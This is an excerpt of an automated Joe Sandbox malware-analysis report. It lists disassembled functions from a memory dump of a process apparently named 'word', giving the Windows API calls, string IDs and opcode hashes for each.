                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                    • String ID:
                                                                    • API String ID: 2223660684-0
                                                                    • Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                    • Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
                                                                    • Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                    • Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
                                                                    APIs
                                                                      • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                      • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00447195
                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                      • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                    • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
                                                                    • LineTo.GDI32(?,00000000,00000002), ref: 004472A0
                                                                    • EndPath.GDI32(?), ref: 004472B0
                                                                    • StrokePath.GDI32(?), ref: 004472BE
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                    • String ID:
                                                                    • API String ID: 2783949968-0
                                                                    • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                    • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                                                                    • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                    • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                                                                    APIs
                                                                    • __getptd.LIBCMT ref: 00417D1A
                                                                      • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                      • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                    • __getptd.LIBCMT ref: 00417D31
                                                                    • __amsg_exit.LIBCMT ref: 00417D3F
                                                                    • __lock.LIBCMT ref: 00417D4F
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                    • String ID:
                                                                    • API String ID: 3521780317-0
                                                                    • Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                    • Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
                                                                    • Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                    • Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
                                                                    APIs
                                                                    • GetDesktopWindow.USER32 ref: 00471144
                                                                    • GetDC.USER32(00000000), ref: 0047114D
                                                                    • GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
                                                                    • ReleaseDC.USER32(00000000,?), ref: 0047117B
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                    • Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
                                                                    • Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                    • Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
                                                                    APIs
                                                                    • GetDesktopWindow.USER32 ref: 00471102
                                                                    • GetDC.USER32(00000000), ref: 0047110B
                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                                                                    • ReleaseDC.USER32(00000000,?), ref: 00471139
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                    • Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
                                                                    • Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                    • Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                    • GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                    • GetCurrentThreadId.KERNEL32(00000000), ref: 004389DA
                                                                    • AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 2710830443-0
                                                                    • Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                    • Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
                                                                    • Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                    • Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
                                                                    • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
                                                                    • CloseHandle.KERNEL32(?), ref: 004390EB
                                                                    • CloseHandle.KERNEL32 ref: 004390F0
                                                                      • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
                                                                      • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000), ref: 00438FC8
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                    • String ID:
                                                                    • API String ID: 146765662-0
                                                                    • Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                    • Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
                                                                    • Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                    • Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
                                                                    APIs
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
                                                                      • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                    • __getptd_noexit.LIBCMT ref: 00414080
                                                                    • __freeptd.LIBCMT ref: 0041408A
                                                                    • ExitThread.KERNEL32 ref: 00414093
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 3182216644-0
                                                                    • Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                    • Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
                                                                    • Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                    • Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharLower
                                                                    • String ID: $8'I
                                                                    • API String ID: 2358735015-3608026889
                                                                    • Opcode ID: 01cd207d7ee81051c359d00525895d5be17945f6ec98bc7782e1a9ecf41ed0c4
                                                                    • Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
                                                                    • Opcode Fuzzy Hash: 01cd207d7ee81051c359d00525895d5be17945f6ec98bc7782e1a9ecf41ed0c4
                                                                    • Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
                                                                    APIs
                                                                    • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                      • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                                                                      • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CopyVariant$ContainedObject$ErrorLast_malloc
                                                                    • String ID: AutoIt3GUI$Container
                                                                    • API String ID: 3380330463-3941886329
                                                                    • Opcode ID: 3891e4faf28c3b34621dceb63a3e0764d8e77eee52b484b9badc09c301117749
                                                                    • Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
                                                                    • Opcode Fuzzy Hash: 3891e4faf28c3b34621dceb63a3e0764d8e77eee52b484b9badc09c301117749
                                                                    • Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00409A61
                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                    • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                    • String ID: 0vH
                                                                    • API String ID: 1143807570-3662162768
                                                                    • Opcode ID: 372cff7c8fe80ba1c4769484b0cb1afe71f4d59ec41951aae85b34b634276aa2
                                                                    • Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
                                                                    • Opcode Fuzzy Hash: 372cff7c8fe80ba1c4769484b0cb1afe71f4d59ec41951aae85b34b634276aa2
                                                                    • Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HH$HH
                                                                    • API String ID: 0-1787419579
                                                                    • Opcode ID: fed4e066af51e45fc8c5976399addcc25001bc25a5639efd16b547c1275b717f
                                                                    • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                                                                    • Opcode Fuzzy Hash: fed4e066af51e45fc8c5976399addcc25001bc25a5639efd16b547c1275b717f
                                                                    • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: InfoItemMenu_memset
                                                                    • String ID: 0
                                                                    • API String ID: 2223754486-4108050209
                                                                    • Opcode ID: 3da1c688f16e7deefa4fc2ca6129b4ed44e1da05ebd6976e0e4859ee148d625a
                                                                    • Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
                                                                    • Opcode Fuzzy Hash: 3da1c688f16e7deefa4fc2ca6129b4ed44e1da05ebd6976e0e4859ee148d625a
                                                                    • Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                    • Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
                                                                    • Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                    • Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                                                                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: Combobox
                                                                    • API String ID: 3850602802-2096851135
                                                                    • Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                    • Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
                                                                    • Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                    • Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
                                                                    APIs
                                                                    • GetWindowTextLengthW.USER32(00000000,?,?,edit,?,00000000,?,?,?,?,?,00000001,?), ref: 004515DA
                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: LengthMessageSendTextWindow
                                                                    • String ID: edit
                                                                    • API String ID: 2978978980-2167791130
                                                                    • Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                    • Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
                                                                    • Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                    • Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000), ref: 00474833
                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 00474846
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemorySleepStatus
                                                                    • String ID: @
                                                                    • API String ID: 2783356886-2766056989
                                                                    • Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                    • Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
                                                                    • Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                    • Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
